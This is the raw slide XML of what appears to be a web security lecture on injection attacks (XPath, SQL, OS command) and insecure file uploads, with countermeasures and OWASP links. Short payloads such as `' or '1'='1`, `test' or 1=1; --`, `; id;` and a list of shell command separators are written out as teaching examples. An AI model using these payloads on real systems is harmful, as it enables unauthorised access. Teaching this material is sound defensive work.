          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454678" y="3256971"/>
            <a:ext cx="8572500" cy="18118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CEF7E55-8719-40D6-B1F5-DAB2AD5EAB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237867" y="5361653"/>
            <a:ext cx="4785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//user[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'][password='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password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</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0">
              <a:latin typeface="+mj-lt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8142B4-C17D-41DF-9098-F9EB368FB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10" y="168659"/>
            <a:ext cx="3836245" cy="300546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AD255C-90D1-4E50-88CB-991F1E15B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694" y="5993004"/>
            <a:ext cx="21050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82A0917-67FB-429A-BD99-B0C3AFD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0" y="168659"/>
            <a:ext cx="3836245" cy="300546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8DC4F2-1420-40F4-A485-516867A0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022" y="633167"/>
            <a:ext cx="6496050" cy="20764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DF88DEF-DE69-442C-B8C4-3D6AA47F8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812"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3454678" y="3256971"/>
            <a:ext cx="8572500" cy="18118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37F242C-5E0F-4D3B-830A-F22ADBD6C5B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4396907" y="5446933"/>
            <a:ext cx="7253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//user[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='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1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asdf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' or '1' = '1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'][password='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>asdf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' or '1' = '1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</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"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D2FF50-7145-4EF0-BFE0-6FE537332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878" y="6062908"/>
            <a:ext cx="15621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2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319747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Retrieve data from XML or manipulate logical flow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39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5124D27-1669-4773-81F3-BB18EFE96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60"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2847975" y="387897"/>
            <a:ext cx="6496050" cy="204360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AA496DF-B173-42F3-9415-E93922FEB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1317239" y="2872443"/>
            <a:ext cx="10125075" cy="167475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D67CC2-CA5E-497C-87F1-BB0F3B4237DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1574616" y="5149575"/>
            <a:ext cx="97225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Select title, name,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from users where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test'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 and password = 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';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT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49818F2-CFED-494B-AAF0-473AA850C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454" y="5862459"/>
            <a:ext cx="8317091" cy="5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3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713550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Retrieve data from XML or manipulate logical flow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XPATH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Verbose / Blind (Time-based)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832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574943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Retrieve data from XML or manipulate logical flow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XPATH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Verbose / Blind (Time-based)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Precompiled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through frameworks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0882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093165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Retrieve data from XML or manipulate logical flow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XPATH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Verbose / Blind (Time-based)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Precompiled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through frameworks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A1:2017-Injection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7277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DD70FC0-8B43-4971-BA8E-417BEE03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backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>injections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99E414-BAA2-463C-AC0F-89D3DCD50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5114" cy="48589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SMTP/Email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https://www.acunetix.com/blog/articles/email-header-injection/ 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/>
              <a:t>LDAP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https://www.netsparker.com/blog/web-security/ldap-injection-how-to-prevent/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html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XML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http://projects.webappsec.org/w/page/13247004/XML%20Injection#:~:text=XML%20Injection%20is%20an%20attack,intend%20logic%20of%20the%20application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.whitehatsec.com/glossary/content/xml-injection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NoSQL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AT" dirty="0"/>
              <a:t>https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.netsparker.com/blog/web-security/what-is-nosql-injection/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://www.acunetix.com/blog/web-security-zone/nosql-injections/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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51509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655C2CFD-5BA0-4F5C-AA14-E695FDB45076}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996793" y="1077385"/>
            <a:ext cx="10198413" cy="209674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all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>these</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>injections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="66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AB982346-B876-4728-8AAF-1CEF2DE7FD56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1128172" y="3683876"/>
            <a:ext cx="10198413" cy="20967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can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also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>attack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server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>itself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>directly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64166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170E234-74AC-4F22-A74B-0505CE224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2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898103" y="493985"/>
            <a:ext cx="8248650" cy="282252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C690FC0-913E-4288-9C7E-A0633D656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588" y="3848872"/>
            <a:ext cx="7305675" cy="77152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073A6F5-F6BD-4D15-9866-8F3A51B13325}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3152780" y="5152764"/>
            <a:ext cx="5739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you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any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problems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285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C2853CA-4751-4773-A8F6-57D9BFA8B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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2152650" y="1166649"/>
            <a:ext cx="7886700" cy="173404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1CAF893-62EB-4356-9BC7-6E8808D8A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588" y="3848872"/>
            <a:ext cx="7305675" cy="7715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CE47FF0-D83A-42DC-B979-5FC6C60AC099}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4134728" y="5212637"/>
            <a:ext cx="377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tail /var/log/apache2/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 id;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.log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36955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2B166-3DDB-431B-8123-D7E34D85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Characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4400" dirty="0" err="1"/>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4400" dirty="0" err="1"/>
              <a:t>separation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C7F541-BAE6-4467-B109-9D33DF862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/>
              <a:t>Windows and Linux/Unix:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  &amp;   &amp;&amp;   |   ||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>Linux/Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>  ;   \n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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original </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>command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`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>$(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>cmd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B76ED-A2F8-4177-8D49-4B3E81A68DF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2293257" y="6308209"/>
            <a:ext cx="7808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/>
              <a:t>https://portswigger.net/web-security/os-command-injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37044590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613764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91012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112013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OS command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262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E95AE9D-F8AC-4AEE-BCAC-6FFCE209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11533"/>
            <a:ext cx="6438900" cy="20097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B1B4691-1368-472C-B534-47087D051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1317239" y="2872443"/>
            <a:ext cx="10125075" cy="167475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B604F8D-4151-4EEF-977A-F8CAD263A2B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="702258" y="5202127"/>
            <a:ext cx="110690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Select title, name,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from users where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test' or 1=1; --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 and password = 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';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" dirty="0">
              <a:latin typeface="+mj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76364A-3CFE-4FC7-B438-F63570D05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5" y="5977306"/>
            <a:ext cx="17716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4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0F6E9-23ED-49C4-9FF3-FF498794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Countermeasures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693375-D79C-4050-8256-B9B1E6399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Just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OS-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code!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>safer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/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APIs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lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>don‘t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lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>STRICT Input Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Explicit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Typecasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Separation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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>input</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>subprocess.run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>() in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>python</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Parameter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>escaping</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>escapeshellcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>() in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a: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672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836581"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="586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OS command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Avoid using direct OS commands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Usage of safer APIs for the specific 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Strict input validation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Separation of command and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Escaping of parameters (output encoding)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12071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336011"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="586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OS command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Avoid using direct OS commands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Usage of safer APIs for the specific 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Strict input validation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Separation of command and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Escaping of parameters (output encoding)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A1:2017-Injection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59948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9AF4D2CD-CD4E-4D7A-A54C-507BB578B2BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070365" y="2296585"/>
            <a:ext cx="10198413" cy="209674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can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>think</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>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another</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>common</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>way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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> code on a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>server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2131348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E8AEA91-FC94-4043-91A7-D6EF07541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" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="252576" y="599089"/>
            <a:ext cx="3867150" cy="468761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D66EEBC-FB41-4AAB-BCB5-3CA1DCC2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163" y="2142795"/>
            <a:ext cx="7686837" cy="8620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5718D21-F537-4158-819C-90A9EA6A0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63" y="722587"/>
            <a:ext cx="6872778" cy="106417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B8FF03D-8D5B-49C7-87C6-7D3632493773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478934" y="3996626"/>
            <a:ext cx="5739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you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any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problems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94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54EFE98-B5B3-4C4F-AC1D-43D6FBC6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542" y="817999"/>
            <a:ext cx="10178916" cy="49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07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4395E09-CE5A-4903-93AF-246C12A0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433387"/>
            <a:ext cx="104203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457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CA067256-774F-4A84-8375-3FB984FB4B11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798787" y="74001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/>
              <a:t>Array (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>   [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>pic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; Array (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [type] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>octet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>-stream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>tmp_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>phpXBWCgN</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>      [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>] =&gt; 107</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>   )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>)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8FE9FE-9398-433B-8C02-0B116ECD0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63" y="3532663"/>
            <a:ext cx="7686837" cy="8620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1C6B943-318E-4568-B530-8F7636C84DCE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6452707" y="1813174"/>
            <a:ext cx="57392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it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all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comes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from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client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–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trustworthy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102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943313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Insecure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 Upload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Upload a malicious file for execution of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36939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00681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Insecure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 Upload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Upload a malicious file for execution of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exploiting insufficient server-side restrictions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885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D7FDDA-EDE1-4AE7-BFCC-AFCF5BA7D893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/>
              <a:t>That</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>‘s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>pretty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> nice,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but </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>can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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>retrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t>?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9836476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D9906-1BA9-4B98-B22D-6815B361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Countermeasures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>excerpt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072D5-C854-4286-BEAB-5433E54C5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/>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> possible, just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a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> (or a S3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>bucket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p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-&gt;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endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Store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webroot</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>recommended</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>: on a separate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>partition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>even</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> a separate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filetype</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>e.g. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>mime_content_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>()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Set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filesize</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>e.g. in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>post_max_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>upload_max_filesize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More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>recommendations</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12361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03672-24FB-44A3-B5D9-4C1450E7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request routing ???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151A4-CFAC-492A-A2CD-11B29D9F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79924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Classic routing:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>http://example.com/showprofile.php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Explicit routing: http://example.com/showprofile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>e.g. Laravel (PHP): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
